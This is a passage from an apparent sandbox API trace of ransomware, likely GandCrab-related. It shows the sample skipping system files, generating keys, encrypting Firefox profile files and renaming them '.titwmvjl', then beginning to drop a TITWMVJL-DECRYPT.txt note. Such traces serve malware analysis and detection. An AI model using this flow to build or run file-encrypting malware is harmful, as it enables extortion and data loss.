lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="ntuser.dat") returned -1 [0080.182] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="iconcache.db") returned -1 [0080.182] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="bootsect.bak") returned -1 [0080.182] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="boot.ini") returned -1 [0080.182] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="ntuser.dat.log") returned -1 [0080.182] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="thumbs.db") returned -1 [0080.182] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0080.182] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0080.182] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="KRAB-DECRYPT.html") returned -1 [0080.182] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="CRAB-DECRYPT.html") returned -1 [0080.182] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="KRAB-DECRYPT.txt") returned -1 [0080.183] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="CRAB-DECRYPT.txt") returned -1 [0080.183] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="ntldr") returned -1 [0080.183] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="NTDETECT.COM") returned -1 [0080.183] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="Bootfont.bin") returned -1 [0080.183] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-plugins.json") returned 102 [0080.183] lstrlenW (lpString=".json") returned 5 [0080.183] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.183] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".json ") returned 6 [0080.183] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.183] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.183] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-plugins.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\blocklist-plugins.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0080.184] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.184] ReadFile (in: hFile=0x2d4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0080.193] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.193] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.194] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0080.197] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0080.197] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0080.197] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0080.197] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0080.197] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.197] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.197] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.197] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.198] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0080.200] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0080.200] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0080.201] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0080.201] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0080.201] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.201] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.201] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.201] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.201] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0080.204] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.204] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503338) returned 1 [0080.204] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.204] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0080.204] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.204] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0080.204] GetLastError () returned 0x0 [0080.204] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.205] CryptDestroyKey (hKey=0x503338) returned 1 [0080.205] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.205] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.205] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.205] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0080.208] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.208] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503938) returned 1 [0080.208] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.208] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0080.208] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.208] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0080.208] GetLastError () returned 0x0 [0080.208] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.209] CryptDestroyKey (hKey=0x503938) returned 1 [0080.209] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.209] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.209] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0080.209] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0080.209] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0x312c0, lpOverlapped=0x0) returned 1 [0080.228] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffced40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.228] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x312c0, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0x312c0, lpOverlapped=0x0) returned 1 [0080.239] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.239] WriteFile (in: hFile=0x2d4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0080.241] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.246] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.247] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.247] CloseHandle (hObject=0x2d4) returned 1 [0080.252] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-plugins.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\blocklist-plugins.json"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-plugins.json.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\blocklist-plugins.json.titwmvjl"), dwFlags=0x1) returned 1 [0080.254] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.254] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0080.254] lstrcmpW (lpString1="blocklist.xml", lpString2=".") returned 1 [0080.254] lstrcmpW (lpString1="blocklist.xml", lpString2="..") returned 1 [0080.254] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="blocklist.xml" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist.xml") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist.xml" [0080.254] lstrlenW (lpString=".titwmvjl") returned 9 [0080.254] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist.xml") returned 93 [0080.254] VirtualAlloc (lpAddress=0x0, dwSize=0xfa, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.254] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist.xml.titwmvjl") returned 102 [0080.254] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist.xml") returned 93 [0080.254] lstrlenW (lpString=".xml") returned 4 [0080.254] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.255] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".xml ") returned 5 [0080.255] lstrcmpiW (lpString1=".xml", lpString2=".titwmvjl") returned 1 [0080.255] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.255] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist.xml") returned 93 [0080.255] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist.xml") returned 93 [0080.255] lstrcmpiW (lpString1="blocklist.xml", lpString2="desktop.ini") returned -1 [0080.255] lstrcmpiW (lpString1="blocklist.xml", lpString2="autorun.inf") returned 1 [0080.255] lstrcmpiW (lpString1="blocklist.xml", lpString2="ntuser.dat") returned -1 [0080.255] lstrcmpiW (lpString1="blocklist.xml", lpString2="iconcache.db") returned -1 [0080.255] lstrcmpiW (lpString1="blocklist.xml", lpString2="bootsect.bak") returned -1 [0080.255] lstrcmpiW (lpString1="blocklist.xml", lpString2="boot.ini") returned -1 [0080.255] lstrcmpiW (lpString1="blocklist.xml", lpString2="ntuser.dat.log") returned -1 [0080.255] lstrcmpiW (lpString1="blocklist.xml", lpString2="thumbs.db") returned -1 [0080.256] lstrcmpiW (lpString1="blocklist.xml", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0080.256] lstrcmpiW (lpString1="blocklist.xml", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0080.256] lstrcmpiW (lpString1="blocklist.xml", lpString2="KRAB-DECRYPT.html") returned -1 [0080.256] lstrcmpiW (lpString1="blocklist.xml", lpString2="CRAB-DECRYPT.html") returned -1 [0080.256] lstrcmpiW (lpString1="blocklist.xml", lpString2="KRAB-DECRYPT.txt") returned -1 [0080.256] lstrcmpiW (lpString1="blocklist.xml", lpString2="CRAB-DECRYPT.txt") returned -1 [0080.256] lstrcmpiW (lpString1="blocklist.xml", lpString2="ntldr") returned -1 [0080.256] lstrcmpiW (lpString1="blocklist.xml", lpString2="NTDETECT.COM") returned -1 [0080.256] lstrcmpiW (lpString1="blocklist.xml", lpString2="Bootfont.bin") returned -1 [0080.256] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist.xml") returned 93 [0080.256] lstrlenW (lpString=".xml") returned 4 [0080.256] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.256] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".xml ") returned 5 [0080.256] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.257] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.257] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\blocklist.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0080.258] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.258] ReadFile (in: hFile=0x2d4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0080.266] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.266] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.267] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0080.270] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0080.271] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0080.271] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0080.271] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0080.271] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.271] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.271] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.272] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.272] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0080.275] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0080.276] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0080.276] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0080.276] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0080.276] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.276] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.276] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.276] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.277] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0080.280] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.280] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503938) returned 1 [0080.280] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.281] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0080.281] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.281] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0080.281] GetLastError () returned 0x0 [0080.281] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.282] CryptDestroyKey (hKey=0x503938) returned 1 [0080.282] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.282] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.282] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.282] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0080.286] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.286] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503738) returned 1 [0080.286] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.286] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0080.286] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.286] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0080.287] GetLastError () returned 0x0 [0080.287] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.287] CryptDestroyKey (hKey=0x503738) returned 1 [0080.287] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.287] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.287] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0080.296] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0080.296] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0x3ef9f, lpOverlapped=0x0) returned 1 [0080.325] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffc1061, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.325] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x3ef9f, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0x3ef9f, lpOverlapped=0x0) returned 1 [0080.334] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.334] WriteFile (in: hFile=0x2d4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0080.336] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.340] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.341] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.341] CloseHandle (hObject=0x2d4) returned 1 [0080.346] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\blocklist.xml"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist.xml.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\blocklist.xml.titwmvjl"), dwFlags=0x1) returned 1 [0080.347] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.347] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0080.347] lstrcmpW (lpString1="bookmarkbackups", lpString2=".") returned 1 [0080.347] lstrcmpW (lpString1="bookmarkbackups", lpString2="..") returned 1 [0080.347] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="bookmarkbackups" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups" [0080.347] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\" [0080.347] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0080.347] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0080.348] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0080.348] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0080.348] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0080.348] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0080.348] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0080.348] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0080.348] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0080.348] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.349] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.349] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\\\TITWMVJL-DECRYPT.txt") returned 117 [0080.349] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\bookmarkbackups\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0080.350] lstrlenW 